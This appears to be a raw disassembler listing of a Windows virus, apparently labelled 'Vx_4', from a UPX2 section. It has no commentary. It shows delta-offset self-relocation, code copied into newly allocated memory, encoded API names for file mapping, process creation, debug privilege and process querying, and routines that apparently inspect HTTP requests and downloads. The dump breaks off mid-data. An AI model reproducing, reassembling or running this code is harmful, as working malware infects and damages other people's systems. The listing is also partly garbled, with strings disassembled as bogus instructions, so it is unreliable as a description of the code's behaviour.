dword ptr [ebp+101578h], 0 and dword ptr [ebp+10157Ch], 0 and dword ptr [ebp+101580h], 0 push edi mov byte ptr [ebp+1012D4h], 1 mov [ebp+103E5Eh], esi loc_314311EA: ; CODE XREF: UPX2:31431176j ; UPX2:31431179j lea esi, [ebp+1015F4h] xor ecx, ecx lea edi, [ebp+103E6Ah] mov cl, 20h call sub_3143158C pop edi call dword ptr [ebp+103EAAh] shr eax, 1Fh jz loc_314312E3 mov eax, [edi+14h] push 40h add eax, ebx push 8001000h mov [ebp+103E62h], eax push 7318h push 0 call dword ptr [ebp+103EE2h] test eax, eax jz loc_31431524 xchg eax, edi lea esi, [ebp+101000h] mov ebp, edi mov ecx, 0CC6h sub ebp, 101000h lea edx, [ebp+101254h] rep movsd jmp edx ; --------------------------------------------------------------------------- sub esp, 20h mov edi, esp push 8 xor eax, eax pop ecx lea edx, [ebp+101B3Dh] rep stosd mov edi, esp mov [edi+10h], edx inc byte ptr [edi+1Ch] push edi push 10003h call dword ptr [ebp+103E62h] add esp, 20h test eax, eax jz loc_31431524 xchg eax, edi push 0 push 1 push 80000400h push 10000h call dword ptr [ebp+103E62h] test eax, eax jz loc_31431524 push 0 push eax push 40000h push 0 shr eax, 0Ch push edi push 1 push eax push 10001h call dword ptr [ebp+103E62h] push 1000Ah call dword ptr [ebp+103E62h] call loc_314312D3 jmp loc_31431524 ; --------------------------------------------------------------------------- loc_314312D3: ; CODE XREF: sub_3143117E+14Bp ; sub_3143117E+162j push 0 pop ecx jecxz short locret_314312E2 push 0Ah call dword ptr [ebp+103ED6h] jmp short loc_314312D3 ; --------------------------------------------------------------------------- locret_314312E2: ; CODE XREF: sub_3143117E+158j retn ; --------------------------------------------------------------------------- loc_314312E3: ; CODE XREF: sub_3143117E+8Bj cmp dword ptr [ebp+103E82h], 0 jz loc_31431524 call near ptr loc_314312FA+1 dec esi push esp inc esp dec esp dec esp loc_314312FA: ; CODE XREF: sub_3143117E+172p add bh, bh sub_3143117E endp ; sp-analysis failed xchg eax, ebp sahf db 3Eh adc [eax], al lea esi, [ebp+1017CEh] xor ecx, ecx lea edi, [ebp+103EEAh] mov cl, 0Eh xchg eax, ebx call sub_3143158C cmp dword ptr [ebp+103F1Eh], 0 jz loc_31431524 mov eax, [ebp+103EEEh] push dword ptr [eax+1] pop dword ptr [ebp+103907h] mov eax, [ebp+103F06h] push dword ptr [eax+1] pop dword ptr [ebp+103954h] mov eax, [ebp+103EF2h] push dword ptr [eax+1] pop dword ptr [ebp+10395Bh] mov ecx, [ebp+103EF6h] jecxz short loc_31431373 push dword ptr [ecx+1] pop dword ptr [ebp+103968h] mov ecx, [ebp+103EFEh] jecxz short loc_31431373 push dword ptr [ecx+1] pop dword ptr [ebp+103975h] loc_31431373: ; CODE XREF: UPX2:31431357j ; UPX2:31431368j call sub_31431530 lea edi, [ebp+103F74h] mov ecx, edi push 0 neg cl push dword ptr [eax+4] and ecx, 3 push 40h add edi, ecx push edi push 0 push 18h lea esi, [ebp+1015DBh] mov ecx, 19h lea eax, ds:0FFFFFFFEh[ecx*2] stosw lea eax, ds:0[ecx*2] stosw lea eax, [edi+4] stosd xor ah, ah lea edx, [ebp+103E20h] loc_314313BC: ; CODE XREF: UPX2:314313C5j lodsb mov [edx], ax stosw add edx, 2 loop loc_314313BC mov edx, esp push 0 push 7318h mov ecx, esp push 0 mov eax, esp push 0 push 8000000h push 40h push ecx push edx push 0Eh push eax call dword ptr [ebp+103EFAh] pop eax add esp, 40h push 7318h mov edx, esp push 0 mov ecx, esp push 40h push 0 push 2 push edx push 0 push 7318h push 0 push ecx push 0FFFFFFFFh push eax call dword ptr [ebp+103F02h] pop edi pop ecx test edi, edi jz loc_31431524 lea esi, [ebp+101000h] mov ecx, 0CC6h mov ebp, edi rep movsd sub ebp, 101000h lea eax, [ebp+10143Ah] jmp eax ; --------------------------------------------------------------------------- dw 5450h dd 0FF6A206Ah, 3F0A95FFh, 0C0850010h, 0E834755Fh, 14Fh dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h dd 550h, 4278B5FFh, 95FF0010h, 103E8Eh, 5295FF57h, 6A00103Eh dd 0FF026A00h, 103E8295h, 128B900h, 2B970000h, 240C89E1h dd 95FF5754h, 103EC6h, 0A583F633h, 103F62h, 0FF575400h dd 103ECA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h dd 0FF2A6A00h, 103EC295h, 74C08500h, 88E893DCh, 33000005h dd 3AE391C9h, 3F628539h, 32750010h, 24247C81h, 73727363h dd 0C1812874h, 0E9Fh, 56505450h, 53505051h, 3E7A95FFh dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F6285h, 0FDC5E800h dd 0FF53FFFFh, 103E5295h, 818EEB00h, 128C4h, 95FF5700h dd 103E52h ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143117E loc_31431524: ; CODE XREF: sub_3143117E+1Fj ; sub_3143117E+B2j ... call dword ptr [ebp+103E52h] jmp loc_314310F0 ; END OF FUNCTION CHUNK FOR sub_3143117E ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_31431530 proc near ; CODE XREF: UPX2:loc_31431373p ; sub_3143154F+2p pop edx push 0 push 0 push 0 push 0 push 40001h mov eax, esp push 0 push eax push 0Ch mov eax, esp jmp edx sub_31431530 endp ; --------------------------------------------------------------------------- aVx_4 db 'Vx_4',0 db 0 ; =============== S U B R O U T I N E ======================================= sub_3143154F proc near ; CODE XREF: sub_3143117E+9p xor ecx, ecx call sub_31431530 lea edx, [ebp+101549h] push edx push ecx push ecx push eax call dword ptr [ebp+103E56h] add esp, 20h retn sub_3143154F endp ; sp-analysis failed ; --------------------------------------------------------------------------- align 4 dd 585858h, 3318h, 0E63h, 1, 2 dup(0) dd 29B0h, 0 ; =============== S U B R O U T I N E ======================================= sub_3143158C proc near ; CODE XREF: sub_3143117E+7Cp ; UPX2:31431312p ... push ecx push esi push ebx call dword ptr [ebp+103E5Eh] stosd pop ecx loc_31431597: ; CODE XREF: sub_3143158C+Ej lodsb test al, al jnz short loc_31431597 loop sub_3143158C retn sub_3143158C endp ; =============== S U B R O U T I N E ======================================= sub_3143159F proc near ; CODE XREF: sub_3143311D+25p ; FUNCTION CHUNK AT 31431629 SIZE 000003C0 BYTES ; FUNCTION CHUNK AT 314319F9 SIZE 00000027 BYTES lea edx, [ebp+101975h] push edx call dword ptr [ebp+103EB6h] mov [ebp+104278h], eax call near ptr loc_314315CC+1 dec esp outsd outsd imul esi, [ebp+70h], 50h jb short loc_31431629 jbe short near ptr loc_31431629+2 insb db 65h, 67h, 65h push esi popa insb jnz short loc_31431630 inc ecx loc_314315CC: ; CODE XREF: sub_3143159F+13p add [eax-1], dl sub_3143159F endp ; sp-analysis failed xchg eax, ebp pop esi db 3Eh adc [eax], al mov [ebp+10427Ch], eax retn ; --------------------------------------------------------------------------- db 5Ch ; \ db 42h ; B db 61h ; a db 73h ; s db 65h ; e db 4Eh ; N db 61h ; a db 6Dh ; m db 65h ; e db 64h ; d db 4Fh ; O db 62h ; b db 6Ah ; j db 65h ; e db 63h ; c db 74h ; t db 73h ; s db 5Ch ; \ db 56h ; V db 74h ; t db 53h ; S db 65h ; e db 63h ; c db 74h ; t db 0 db 6Ch ; l db 73h ; s db 74h ; t db 72h ; r db 6Ch ; l db 65h ; e db 6Eh ; n db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 46h ; F db 69h ; i db 6Ch ; l db 65h ; e db 41h ; A db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 46h ; F db 69h ; i db 6Ch ; l db 65h ; e db 4Dh ; M db 61h ; a db 70h ; p db 70h ; p db 69h ; i db 6Eh ; n db 67h ; g db 41h ; A db 0 db 43h ; C db 72h ; r db 65h ; e db 61h ; a db 74h ; t db 65h ; e db 50h ; P db 72h ; r db 6Fh ; o db 63h ; c db 65h ; e db 73h ; s db 73h ; s db 41h ; A ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143159F loc_31431629: ; CODE XREF: sub_3143159F+1Fj ; sub_3143159F+21j add [ebx+72h], al db 65h popa jz short near ptr loc_31431693+2 loc_31431630: ; CODE XREF: sub_3143159F+2Aj push edx db 65h insd outsd jz short loc_3143169B push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314316A6+2 push esp push 64616572h add [ebx+72h], al db 65h popa jz short near ptr loc_314316B2+3 push esp outsd outsd insb push 33706C65h xor dl, [ebx+6Eh] popa jo short near ptr loc_314316D1+1 push 4500746Fh js short loc_314316CF jz short near ptr loc_314316BB+1 push 64616572h add [esi+69h], al insb db 65h push esp imul ebp, [ebp+65h], 79536F54h jnb short loc_314316F0 db 65h insd push esp imul ebp, [ebp+65h], 65724600h db 65h dec esp imul esp, [edx+72h], 797261h inc edi db 65h jz short near ptr loc_314316D3+6 loc_31431693: ; CODE XREF: sub_3143159F+8Fj imul ebp, [ebp+41h], 69727474h loc_3143169B: ; CODE XREF: sub_3143159F+95j bound esi, [ebp+74h] db 65h jnb short loc_314316E2 add [edi+65h], al jz short near ptr loc_314316EB+1 loc_314316A6: ; CODE XREF: sub_3143159F+A2j imul ebp, [ebp+53h], 657A69h inc edi db 65h jz short loc_314316F8 loc_314316B2: ; CODE XREF: sub_3143159F+AFj imul ebp, [ebp+54h], 656D69h inc edi loc_314316BB: ; CODE XREF: sub_3143159F+C7j db 65h jz short near ptr loc_3143170A+1 outsd db 64h jnz short near ptr loc_31431729+5 db 65h dec eax popa outsb db 64h insb db 65h inc ecx add [edi+65h], al jz short near ptr loc_3143171D+6 loc_314316CF: ; CODE XREF: sub_3143159F+C5j db 65h insd loc_314316D1: ; CODE XREF: sub_3143159F+BEj jo short near ptr loc_31431717+2 loc_314316D3: ; CODE XREF: sub_3143159F+F1j imul ebp, [ebp+4Eh], 41656D61h add [edi+65h], al jz short near ptr loc_31431731+3 db 65h insd loc_314316E2: ; CODE XREF: sub_3143159F+FFj jo short near ptr loc_31431731+3 popa jz short near ptr loc_3143174E+1 inc ecx add [edi+65h], al loc_314316EB: ; CODE XREF: sub_3143159F+105j jz short loc_31431743 db 65h jb short near ptr loc_31431762+1 loc_314316F0: ; CODE XREF: sub_3143159F+DBj imul ebp, [edi+6Eh], 74654700h push esi loc_314316F8: ; CODE XREF: sub_3143159F+110j db 65h jb short near ptr loc_3143176C+2 imul ebp, [edi+6Eh], 417845h inc edi db 65h jz short near ptr loc_3143175B+1 outsd insb jnz short near ptr loc_31431771+6 loc_3143170A: ; CODE XREF: sub_3143159F:loc_314316BBj db 65h dec ecx outsb outsw jb short near ptr loc_3143177C+2 popa jz short near ptr loc_3143177C+1 outsd outsb inc ecx loc_31431717: ; CODE XREF: sub_3143159F:loc_314316D1j add [edi+ebp*2+61h], cl db 64h dec esp loc_3143171D: ; CODE XREF: sub_3143159F+12Ej imul esp, [edx+72h], 41797261h add [ebp+61h], cl jo short loc_3143177F loc_31431729: ; CODE XREF: sub_3143159F+120j imul esp, [ebp+77h], 6946664Fh insb loc_31431731: ; CODE XREF: sub_3143159F+13Fj ; sub_3143159F:loc_314316E2j add gs:[edi+70h], cl outs dx, byte ptr gs:[esi] inc esi imul ebp, [ebp+4Dh], 69707061h outsb db 67h inc ecx loc_31431743: ; CODE XREF: sub_3143159F:loc_314316EBj add [edi+70h], cl outs dx, byte ptr gs:[esi] push eax jb short near ptr loc_314317B9+1 arpl [ebp+73h], sp loc_3143174E: ; CODE XREF: sub_3143159F+146j jnb short $+2 push eax jb short loc_314317C2 arpl [ebp+73h], sp jnb short near ptr loc_31431784+7 xor al, [esi+69h] loc_3143175B: ; CODE XREF: sub_3143159F+164j jb short near ptr loc_314317CA+6 jz short $+2 push eax jb short near ptr loc_314317CA+7 loc_31431762: ; CODE XREF: sub_3143159F+14Ej arpl [ebp+73h], sp jnb short near ptr loc_31431799+1 xor cl, [esi+65h] js short near ptr loc_314317DC+4 loc_3143176C: ; CODE XREF: sub_3143159F:loc_314316F8j add [ebx+65h], dl jz short near ptr loc_314317B5+2 loc_31431771: ; CODE XREF: sub_3143159F+169j imul ebp, [ebp+41h], 69727474h bound esi, [ebp+74h] loc_3143177C: ; CODE XREF: sub_3143159F+173j ; sub_3143159F+170j db 65h jnb short loc_314317C0 loc_3143177F: ; CODE XREF: sub_3143159F+188j add [ebx+65h], dl jz short loc_314317CA loc_31431784: ; CODE XREF: sub_3143159F+1B7j imul ebp, [ebp+54h], 656D69h push ebx insb db 65h, 65h jo short $+4 push ebx jns short loc_31431808 jz short loc_314317FC insd push esp loc_31431799: ; CODE XREF: sub_3143159F+1C6j imul ebp, [ebp+65h], 69466F54h insb db 65h push esp imul ebp, [ebp+65h], 6D6E5500h popa jo short loc_31431803 imul esp, [ebp+77h], 6946664Fh insb loc_314317B5: ; CODE XREF: sub_3143159F+1D0j add gs:[esi+69h], dl loc_314317B9: ; CODE XREF: sub_3143159F+1AAj jb short near ptr loc_3143182E+1 jnz short loc_3143181E insb inc ecx insb loc_314317C0: ; CODE XREF: sub_3143159F:loc_3143177Cj insb outsd loc_314317C2: ; CODE XREF: sub_3143159F+1B2j arpl [eax], ax push edi jb short loc_31431830 jz short loc_3143182E inc esi loc_314317CA: ; CODE XREF: sub_3143159F+1E3j ; sub_3143159F:loc_3143175Bj ... imul ebp, [ebp+0], 6441744Eh push 75h jnb short loc_3143184A push eax jb short near ptr loc_3143183F+3 jbe short near ptr loc_3143183F+5 insb loc_314317DC: ; CODE XREF: sub_3143159F+1CBj db 65h, 67h, 65h jnb near ptr 1835h outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_3143182B+1 jb short near ptr loc_3143184F+1 popa jz short loc_31431853 inc esi imul ebp, [ebp+0], 7243744Eh db 65h popa jz short loc_31431860 push eax loc_314317FC: ; CODE XREF: sub_3143159F+1F6j jb short loc_3143186D arpl [ebp+73h], sp jnb short $+2 loc_31431803: ; CODE XREF: sub_3143159F+20Cj dec esi jz short near ptr loc_31431846+3 jb short loc_3143186D loc_31431808: ; CODE XREF: sub_3143159F+1F4j popa jz short loc_31431870 push eax jb short loc_3143187D arpl [ebp+73h], sp jnb short near ptr loc_31431853+5 js short $+2 dec esi jz short loc_3143185B jb short loc_3143187F popa jz short near ptr loc_3143187F+3 push ebx loc_3143181E: ; CODE XREF: sub_3143159F+21Cj arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl inc ebx jb short near ptr loc_3143188E+1 popa loc_3143182B: ; CODE XREF: sub_3143159F+248j jz short loc_31431892 push ebp loc_3143182E: ; CODE XREF: sub_3143159F+228j ; sub_3143159F:loc_314317B9j jnb short near ptr loc_31431894+1 loc_31431830: ; CODE XREF: sub_3143159F+226j jb short near ptr loc_3143187F+3 jb short loc_314318A3 arpl [ebp+73h], sp jnb short $+2 dec esi jz short loc_31431889 popa jo short near ptr loc_31431894+1 loc_3143183F: ; CODE XREF: sub_3143159F+238j ; sub_3143159F+23Aj imul esp, [ebp+77h], 6553664Fh loc_31431846: ; CODE XREF: sub_3143159F+265j arpl [ecx+ebp*2+6Fh], si loc_3143184A: ; CODE XREF: sub_3143159F+235j outsb add [esi+74h], cl dec edi loc_3143184F: ; CODE XREF: sub_3143159F+24Aj jo short loc_314318B6 outsb inc esi loc_31431853: ; CODE XREF: sub_3143159F+24Dj ; sub_3143159F+272j imul ebp, [ebp+0], 704F744Eh loc_3143185B: ; CODE XREF: sub_3143159F+277j outs dx, byte ptr gs:[esi] push eax jb short loc_314318CF loc_31431860: ; CODE XREF: sub_3143159F+25Aj arpl [ebp+73h], sp jnb short loc_314318B9 outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314318BB+1 loc_3143186D: ; CODE XREF: sub_3143159F:loc_314317FCj ; sub_3143159F+267j jo short near ptr loc_314318D3+1 outsb loc_31431870: ; CODE XREF: sub_3143159F+26Aj push ebx arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl push eax jb short near ptr loc_314318EB+1 loc_3143187D: ; CODE XREF: sub_3143159F+26Dj jz short near ptr loc_314318E3+1 loc_3143187F: ; CODE XREF: sub_3143159F+279j ; sub_3143159F+27Cj ... arpl [esi+edx*2+69h], si jb short loc_314318F9 jnz short near ptr loc_314318E7+1 insb dec ebp loc_31431889: ; CODE XREF: sub_3143159F+29Bj db 65h insd outsd jb short near ptr loc_31431904+3 loc_3143188E: ; CODE XREF: sub_3143159F+289j add [esi+74h], cl push ecx loc_31431892: ; CODE XREF: sub_3143159F:loc_3143182Bj jnz short loc_314318F9 loc_31431894: ; CODE XREF: sub_3143159F:loc_3143182Ej ; sub_3143159F+29Ej jb short near ptr loc_3143190E+1 dec ecx outsb outsw jb short near ptr loc_31431908+1 popa jz short loc_31431908 outsd outsb push esp outsd loc_314318A3: ; CODE XREF: sub_3143159F+293j imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314318FF+2 jb short loc_31431915 jz short near ptr loc_31431912+1 push esi imul esi, [edx+74h], 4D6C6175h loc_314318B6: ; CODE XREF: sub_3143159F:loc_3143184Fj db 65h insd outsd loc_314318B9: ; CODE XREF: sub_3143159F+2C4j jb short loc_31431934 loc_314318BB: ; CODE XREF: sub_3143159F+2CCj add [edx+74h], dl insb push ebp outsb imul esp, [ebx+6Fh], 74536564h jb short near ptr loc_31431931+2 outsb db 67h push esp outsd inc ecx loc_314318CF: ; CODE XREF: sub_3143159F+2BFj outsb jnb short near ptr loc_3143193A+1 push ebx loc_314318D3: ; CODE XREF: sub_3143159F:loc_3143186Dj jz short loc_31431947 imul ebp, [esi+67h], 41535700h push ebx jz short loc_31431940 jb short loc_31431955 jnz short near ptr loc_31431952+1 loc_314318E3: ; CODE XREF: sub_3143159F:loc_3143187Dj add [ebx+6Ch], ah outsd loc_314318E7: ; CODE XREF: sub_3143159F+2E6j jnb short loc_3143194E jnb short near ptr loc_31431959+1 loc_314318EB: ; CODE XREF: sub_3143159F+2DCj arpl [ebx+65h], bp jz short $+2 arpl [edi+6Eh], bp outsb arpl gs:[eax+eax+67h], si loc_314318F9: ; CODE XREF: sub_3143159F+2E4j ; sub_3143159F:loc_31431892j db 65h jz short near ptr loc_31431963+1 outsd jnb short near ptr loc_31431971+2 loc_314318FF: ; CODE XREF: sub_3143159F+309j bound edi, [ecx+6Eh] popa insd loc_31431904: ; CODE XREF: sub_3143159F+2EDj add gs:[edx+65h], dh loc_31431908: ; CODE XREF: sub_3143159F+2FEj ; sub_3143159F+2FBj arpl [esi+0], si jnb short near ptr loc_31431971+1 outsb loc_3143190E: ; CODE XREF: sub_3143159F:loc_31431894j add fs:[ebx+6Fh], dh loc_31431912: ; CODE XREF: sub_3143159F+30Dj arpl [ebx+65h], bp loc_31431915: ; CODE XREF: sub_3143159F+30Bj jz short $+2 dec ecx outsb jz short loc_31431980 jb short loc_3143198B db 65h jz short loc_31431963 insb outsd jnb short near ptr loc_31431988+1 dec eax popa outsb db 64h insb add gs:[ecx+6Eh], cl jz short loc_31431994 jb short near ptr loc_3143199E+1 loc_31431931: ; CODE XREF: sub_3143159F+329j db 65h jz short loc_3143197B loc_31431934: ; CODE XREF: sub_3143159F:loc_314318B9j db 65h jz short loc_3143197A outsd outsb outsb loc_3143193A: ; CODE XREF: sub_3143159F+331j arpl gs:[ebp+64h], si push ebx loc_31431940: ; CODE XREF: sub_3143159F+33Ej jz short near ptr loc_314319A2+1 jz short loc_314319A9 add [ecx+6Eh], cl loc_31431947: ; CODE XREF: sub_3143159F:loc_314318D3j jz short near ptr loc_314319AC+2 jb short loc_314319B9 db 65h jz short near ptr loc_3143199B+2 loc_3143194E: ; CODE XREF: sub_3143159F:loc_314318E7j jo short loc_314319B5 outsb inc ecx loc_31431952: ; CODE XREF: sub_3143159F+342j add [ecx+6Eh], cl loc_31431955: ; CODE XREF: sub_3143159F+340j jz short near ptr loc_314319BB+1 jb short loc_314319C7 loc_31431959: ; CODE XREF: sub_3143159F+34Aj db 65h jz short near ptr loc_314319AA+1 jo short loc_314319C3 outsb push ebp jb short near ptr loc_314319CC+2 inc ecx loc_31431963: ; CODE XREF: sub_3143159F+37Ej ; sub_3143159F:loc_314318F9j add [ecx+6Eh], cl jz short near ptr loc_314319CC+1 jb short loc_314319D8 db 65h jz short near ptr loc_314319BE+1 db 65h popa db 64h inc esi loc_31431971: ; CODE XREF: sub_3143159F+36Cj ; sub_3143159F+35Ej imul ebp, [ebp+0], 41564441h push eax loc_3143197A: ; CODE XREF: sub_3143159F:loc_31431934j dec ecx loc_3143197B: ; CODE XREF: sub_3143159F:loc_31431931j xor esi, [edx] db 2Eh inc esp dec esp loc_31431980: ; CODE XREF: sub_3143159F+37Aj dec esp add [edx+65h], dl db 67h inc ebx insb outsd loc_31431988: ; CODE XREF: sub_3143159F+383j jnb short near ptr loc_314319ED+2 dec ebx loc_3143198B: ; CODE XREF: sub_3143159F+37Cj db 65h jns short $+3 push edx db 65h, 67h dec edi jo short loc_314319F9 loc_31431994: ; CODE XREF: sub_3143159F+38Ej outsb dec ebx db 65h jns short near ptr loc_314319DC+2 js short loc_314319DC loc_3143199B: ; CODE XREF: sub_3143159F+3ACj add [edx+65h], dl loc_3143199E: ; CODE XREF: sub_3143159F+390j db 67h push ecx jnz short loc_31431A07 loc_314319A2: ; CODE XREF: sub_3143159F:loc_31431940j jb short near ptr loc_31431A1C+1 push esi popa insb jnz short near ptr loc_31431A0D+1 loc_314319A9: ; CODE XREF: sub_3143159F+3A3j inc ebp loc_314319AA: ; CODE XREF: sub_3143159F:loc_31431959j js short loc_314319ED loc_314319AC: ; CODE XREF: sub_3143159F:loc_31431947j add [edx+65h], dl db 67h push ebx db 65h jz short loc_31431A0A popa loc_314319B5: ; CODE XREF: sub_3143159F:loc_3143194Ej insb jnz short near ptr loc_31431A1C+1 inc ebp loc_314319B9: ; CODE XREF: sub_3143159F+3AAj js short loc_314319FC loc_314319BB: ; CODE XREF: sub_3143159F:loc_31431955j add [esi+33h], dl loc_314319BE: ; CODE XREF: sub_3143159F+3CBj imul byte ptr [edx+2] push esi push esi loc_314319C3: ; CODE XREF: sub_3143159F+3BDj mov edx, esp push 1 loc_314319C7: ; CODE XREF: sub_3143159F+3B8j push edx push dword ptr [edx+18h] push esi loc_314319CC: ; CODE XREF: sub_3143159F+3C7j ; sub_3143159F+3C1j call dword ptr [ebp+10427Ch] mov eax, esp push esi push esi push esi push eax loc_314319D8: ; CODE XREF: sub_3143159F+3C9j push esi push dword ptr [eax+18h] loc_314319DC: ; CODE XREF: sub_3143159F+3FAj ; sub_3143159F+3F7j call dword ptr [ebp+103EEAh] add esp, 10h pop esi retn 8 ; END OF FUNCTION CHUNK FOR sub_3143159F ; --------------------------------------------------------------------------- db 8Dh ; db 49h ; I db 0FBh ; db 2Bh ; + ; --------------------------------------------------------------------------- loc_314319ED: ; CODE XREF: sub_3143159F:loc_314319AAj ; sub_3143159F:loc_31431988j enter 6851h, 0 ; --------------------------------------------------------------------------- db 0 db 0 db 0E8h ; db 8Dh ; db 4Ch ; L db 24h ; $ db 3 db 6Ah ; j ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143159F loc_314319F9: ; CODE XREF: sub_3143159F+3F3j add [edx+5], ch loc_314319FC: ; CODE XREF: sub_3143159F:loc_314319B9j push ecx push eax push ebx push 5 mov ecx, esp push eax mov edx, esp push eax loc_31431A07: ; CODE XREF: sub_3143159F+401j push esp push 40h loc_31431A0A: ; CODE XREF: sub_3143159F+412j push ecx push edx push ebx loc_31431A0D: ; CODE XREF: sub_3143159F+408j call dword ptr [ebp+103F12h] add esp, 0Ch call dword ptr [ebp+103F1Ah] loc_31431A1C: ; CODE XREF: sub_3143159F:loc_314319A2j ; sub_3143159F+417j add esp, 8 retn ; END OF FUNCTION CHUNK FOR sub_3143159F ; --------------------------------------------------------------------------- db 8Dh ; db 95h ; db 20h db 3Eh ; > db 10h db 0 db 33h ; 3 db 0C9h ; db 6Ah ; j db 0 db 52h ; R db 68h ; h db 30h ; 0 db 0 db 32h ; 2 db 0 db 8Bh ; db 0C4h ; db 51h ; Q db 51h ; Q db 6Ah ; j db 40h ; @ db 50h ; P db 51h ; Q db 6Ah ; j db 18h db 83h ; db 0C0h ; db 8 db 54h ; T db 6Ah ; j db 0Eh db 50h ; P db 0FFh db 95h ; db 0Eh db 3Fh ; ? db 10h db 0 db 83h ; db 0C4h ; db 20h db 33h ; 3 db 0D2h ; db 85h ; db 0C0h ; db 0Fh db 99h ; db 0C2h ; db 0F7h ; db 0DAh ; db 58h ; X db 23h ; # db 0C2h ; db 0C3h ; db 57h ; W db 33h ; 3 db 0FFh db 0E8h ; db 0C1h ; db 0FFh db 0FFh db 0FFh db 0Fh db 84h ; db 0A5h ; db 0 db 0 db 0 db 50h ; P db 68h ; h db 18h db 73h ; s db 0 db 0 db 8Bh ; db 0D4h ; db 6Ah ; j db 0 db 8Bh ; db 0CCh ; db 6Ah ; j db 40h ; @ db 68h ; h db 0 db 0 db 10h db 0 db 6Ah ; j db 2 db 52h ; R db 6Ah ; j db 0 db 68h ; h db 18h db 73h ; s db 0 db 0 db 6Ah ; j db 0 db 51h ; Q db 53h ; S db 50h ; P db 0FFh db 95h ; db 2 db 3Fh ; ? db 10h db 0 db 5Fh ; _ db 59h ; Y db 0FFh db 95h ; db 52h ; R db 3Eh ; > db 10h db 0 db 85h ; db 0FFh db 74h ; t db 71h ; q db 8Bh ; db 8Dh ; db 80h ; db 15h db 10h db 0 db 0E3h ; db 0Ch db 8Dh ; db 95h ; db 0 db 10h db 10h db 0 db 3 db 0D1h ; db 57h ; W db 53h ; S db 0FFh db 0D2h ; db 8Bh ; db 85h ; db 0EEh ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 6 db 29h ; ) db 0 db 0 db 0E8h ; db 2Bh ; + db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 6 db 3Fh ; ? db 10h db 0 db 8Dh ; db 8Fh ; db 53h ; S db 29h ; ) db 0 db 0 db 0E8h ; db 1Ah db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F2h ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 5Ah ; Z db 29h ; ) db 0 db 0 db 0E8h ; db 9 db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F6h ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 20h db 8Dh ; db 8Fh ; db 67h ; g db 29h ; ) db 0 db 0 db 0E8h ; db 0F4h ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 85h ; db 0FEh ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 0Bh db 8Dh ; db 8Fh ; db 74h ; t db 29h ; ) db 0 db 0 db 0E8h ; db 0DFh ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 0C7h ; db 5Fh ; _ db 0C3h ; db 55h ; U db 0E8h ; db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- pop ebp sub ebp, 101B14h xor ecx, ecx lea eax, [ebp+101E9Fh] push ecx push esp push ecx push ecx push eax push ecx push ecx call dword ptr [ebp+103E7Eh] xchg eax, [esp] call dword ptr [ebp+103E52h] pop ebp retn 4 ; --------------------------------------------------------------------------- db 55h, 0E8h, 0 dd 5D000000h, 1B43ED81h, 0FF6A0010h, 1B0E958Dh, 52500010h dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B54h, 85C720CDh dd 101B56h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h dd 69C3F075h, 103F6C95h, 8840500h, 95894208h, 103F6Ch dd 55C3E2F7h, 0E8h, 0ED815D00h, 101B9Dh, 3F709D8Bh, 7C830010h dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0A695FF00h dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h dd 0A295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h dd 68016Ah, 52400000h, 3E6E95FFh, 85960010h, 505B74F6h dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F4Eh dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EE695FFh dd 85590010h, 56D075C0h, 3E5295FFh, 578D0010h, 6A575244h dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h dd 3E7695FFh, 0C4810010h, 208h, 82474FFh, 3F3E95FFh, 0FF530010h dd 103F3E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10157C8Dh dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h dd 6A51CEh, 0FF535651h, 103F3695h, 0C13B5900h, 0DF850Fh dd 858D0000h, 101E93h, 0C68006Ah, 50000000h, 3695FF53h dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h dd 103ED6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh dd 64616Fh, 3F4695FFh, 0C0850010h, 0C9333674h, 3F708589h dd 68510010h, 80000200h, 50565151h, 3F4A95FFh, 